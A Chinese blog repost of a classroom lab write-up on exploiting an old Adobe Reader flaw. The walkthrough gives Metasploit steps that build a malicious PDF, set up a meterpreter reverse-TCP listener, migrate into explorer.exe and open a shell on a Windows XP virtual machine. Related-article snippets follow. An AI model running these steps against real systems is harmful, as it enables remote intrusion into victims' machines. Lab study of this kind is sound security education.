Adobe阅读器渗透攻击

最新推荐文章于 2024-09-13 12:25:43 发布
最新推荐文章于 2024-09-13 12:25:43 发布
阅读量105 收藏 1
点赞数
文章标签: 运维 网络 shell
原文链接:http://www.cnblogs.com/yayaer/p/6685695.html
版权

Adobe阅读器渗透攻击

实验前准备

1、两台虚拟机,其中一台为kali,一台为windows xp sp3(老师给的xp虚拟机winxpAttaker,密码:mima1234)。

2、设置虚拟机网络为NAT模式,保证两台虚拟机可以ping通。

3、kali下打开显示隐藏文件,如下图,先打开主文件夹,在右上角打开如下图所示位置:

886770-20170411165736641-1234907428.jpg

实验步骤:

1、在kali终端中开启msfconsole。

2、输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。

3、使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。

4、输入命令show options显示我们需要在攻击前需要设置的数据,如下图红框圈住的部分。

886770-20170409172625503-2018487708.png

5、输入命令

set FILENAME xxx.pdf 

set LHOST "KALI Ip"

set LPORT xxxx

并使用命令show options,看是否设置成功。

886770-20170409173100425-1162316580.png

6、输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。

886770-20170409173322628-1303807652.png

7、使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。

8、使用set payload windows/meterpreter/reverse_tcp建立一个反向连接。如下图所示,我需要输入命令set LPORT 5555和攻击模块里的数据设置为一样的。

886770-20170409174151941-330206240.png

9、使用命令exploit开始攻击,在xp中打开pdf。这里pdf比较难打开,直接在kali中等结果就可以啦,如下图:

886770-20170409175317003-813394290.png

10、将进程迁移到explorer.exe.使用ps查看当前进程,并找到explorer.exe的进程号,如下图所示,使用命令migrate 1324

886770-20170409175605175-767391390.png

11、输入shell,查看xp靶机信息。

886770-20170409175821769-38403533.png

12、在靶机xp中使用命令netstat -an,看本地tcp连接。

886770-20170409180015003-1646154618.png

转载于:https://www.cnblogs.com/yayaer/p/6685695.html

weixin_30388677
关注
【愚公系列】2023年05月 网络安全高级班 079.Kali Linux&Metasploit渗透测试(Metasploit漏洞利用阶段)
时光隧道
05-31 7708
Metasploit实战通常可以分为三个阶段:信息搜集、漏洞利用和提权。信息搜集阶段:在这个阶段中,渗透测试人员需要利用各种可用的信息收集工具和技术收集目标系统的关键信息。这些信息可能包括目标系统的IP地址、端口、网络拓扑、服务和应用程序版本信息、操作系统、Web应用程序框架等等。漏洞利用阶段:在这个阶段中,渗透测试人员使用已知的或自己发现的漏洞来攻击目标系统。渗透测试人员使用Metasploit框架来执行攻击,并尝试获得对目标系统的访问权限。这个阶段中还可能包括密码破解和社会工程学等攻击技术。
渗透测试
yes_angel的博客
06-25 2539
渗透测试工具 网络扫描工具、通用漏洞检测、应用漏洞检测三类 网络扫描工具 1.  系统自带工具: 2. NMap 3. SuperScan 4. Wireshark:通常被用于嗅探局域网内的数据传输格式,探查是否存在明文传输口令、数据传输风险等 通用漏洞扫描工具 通用漏洞主要指操作系统本身或者安装的应用软件所存在的漏洞,通常是指缓冲区漏洞,例如MS-08-067、MS-12
Adobe阅读器渗透攻击实战案例
Goallegoal的博客
05-02 554
Adobe阅读器渗透攻击实战案例 低版本的adobe reader 9.0版本会出现溢出攻击
Adobe阅读器渗透实战
自学编程_youkewang.top
03-05 825
0x00:实验的漏洞:CVE-2010-2883 针对的软件版本:Adobe阅读器的8.2.4 到 9.3.4之间的版本.   0x01:首先我们使用msfconsole进入MSF界面,然后通过Search命令查找相应的exploit攻击模块,设置攻击载荷,显示设置选项如图1-1.   图1-1. 0x02:设置options中的内容,第一条命令是设置生成的恶意pdf文件的名称,第二
20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击
weixin_30412577的博客
04-12 139
20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击 实验内容 初步掌握平台matesploit的使用 有了初步完成渗透操作的思路 本次攻击对象为:windows xp sp3 / Adobe 9.3 主机为kali的ip地址为:192.168.199.220、靶机windows xp 的ip地址为:192.168.199.137 实验步骤 使用命令msfconsole进入...
如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~)
weixin_46238756的博客
11-01 1953
如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~) 文末赠送超级干货哈 一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上执行有限命令
渗透测试-pdf文件上传-XSS
热门推荐
cdyunaq的博客
01-06 1万+
前言 pdf是portable document format的缩写,是目前广泛应用于各种场合的文件格式,其是由Adobe公司根据Postscript语言修改后提出的文件标准,并且被ISO组织接受,目前已经发展到2.0版本(ISO32000-2)。 目前广泛使用的是1.7版本,该版本pdf功能已经相当丰富,可以显示3D模型,播放多媒体音视频,执行Javascript脚本等功能。 PDF中的JavaScript利用 Pdf文件是应用广泛的一种文件格式,很多针对Adobe阅读器的CVE漏洞都是通过pdf
如何解析域名到网站?
聚名网
09-11 392
用户通过输入易于记忆的域名来访问网站,而背后则是复杂的域名解析机制将域名转换为服务器的IP地址,使得浏览器能够找到并加载目标网站。顶级域名服务器:顶级域名服务器会返回负责该域名的权威DNS服务器的地址。返回结果:一旦本地DNS服务器获得了IP地址,它会将该信息缓存一段时间(TTL,生存时间),然后将结果返回给用户的浏览器。用户输入域名:当用户在浏览器中输入一个域名并按下回车键时,浏览器会检查本地缓存,查看是否已经存储了该域名的IP地址。权威DNS服务器:存储特定域名的DNS记录,提供最终的IP地址。
SQL server 日常运维命令
2301_76664379的博客
09-10 1574
【代码】SQL server 日常运维命令。
Linux常用命令速查手册
敲代码别忘了喝上一杯凉白开。
09-08 293
本文汇总了一系列实用的Linux命令,适用于日常开发和系统管理。首先,展示了如何新增用户及其配置、使用 `tar` 解压文件,以及安装和使用 `zip` 工具进行文件压缩和解压。此外,还包括在macOS中查看端口占用的命令和通过 `TOP` 命令切换内存显示单位的技巧。接着,介绍了如何使用 `Base64` 进行字符串编码,以及快速创建多个文件夹并从Docker容器中复制文件的方法。这些命令对于提高工作效率和管理Linux系统至关重要,尤其适合开发者和系统管理员快速查阅和使用。
mycat双主高可用架构部署-mycat安装
龙哥·三年风水从2011年开始做IT工作,从ps画图到前端开发->后端开发->框架开发->业务架构设计及开发->业务需求整理、开发->技术经理->技术总监
09-08 955
mycat双主高可用架构部署-mycat安装
nginx 使用篇 配置
2302_77426533的博客
09-09 1304
nginx的配置 在conf目录下的nginx.conf文件nginx.conf文件 主要分为三部分①全局配置:配置一些全局属性: 这个指令设置了每个worker进程能够同时开启的最大连接数③http配置 :配置http的相关配置二、nginx使用基本命令1.启动:双击nginx.exe或者打开cmd命令窗口,切换到nginx解压目录下,输入命令nginx.exe,回车即可2.关闭(1)输入nginx命令(快速停止nginx) 或(完整有序的停止nginx)(2)使用taskkill。
linux运维常见命令行
wendao76的专栏
09-09 1704
linux常用命令行,用户管理,文件管理, 磁盘管理, 网络管里,进程管理等等
怎样解决OpenEuler下载sdl2失败
qq_53674101的博客
09-08 420
怎样解决openEuler下载sdl2失败
Ruoyi Cloud 本地启动
maplecsd的博客
09-09 2140
参考 http://doc.ruoyi.vip/ https://gitee.com/y_project/RuoYi-Cloud https://blog.csdn.net/cs_dnzk/article/details/135289966 https://doc.ruoyi.vip/ruoyi-cloud/cloud/seata.html#%E5%9F%BA%E6%9C%AC%E4%BB%8B%E7%BB%8D 拉取代码本地跑通 用 git 从 ruoyi 微服务版仓库拉取代码:https://gitee
最新版微服务项目搭建
m0_46606920的博客
09-08 1275
最新版微服务搭建,使用nacos,redis,mongodb,gateway,openfeign等技术
安徽省农行三级网扁平化运维案例:监控易助力实现高效链路监测与一体化运维
最新发布
MXsoft618的博客
09-13 392
通过拓扑图链路监管、自动巡检、定向告警等功能的应用,监控易为安徽省农行提供了高效、稳定的运维管理解决方案,助力其实现了业务系统的稳定运行和运维效率的提升。这些网点之间以及与外部运营商之间的链路错综复杂,如何确保这些链路的稳定运行,成为运维管理的关键。此外,安徽省农行还需要对所有网点进行一体化运维管理,实时监控网络配置和变更,及时发现设备隐患,提高运维效率。为了提升运维效率,确保业务系统的稳定运行,安徽省农行选择了监控易作为其运维管理的核心平台,成功实现了三级网扁平化运维改造。
私有云 centos7 yum 找不到源
yangziqi098的博客
09-12 174
私有云 centos7 yum 找不到源
Mahout实战指南:音频视频需Adobe阅读器
此外,书中还包含了音频和视频链接,这些资源通常需要Adobe Acrobat Reader来访问,以便读者能够获得更丰富的学习体验。 《Mahout in Action》的封面信息可能包含了诸如“数据科学入门”、“Hadoop技术揭秘”或“大...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值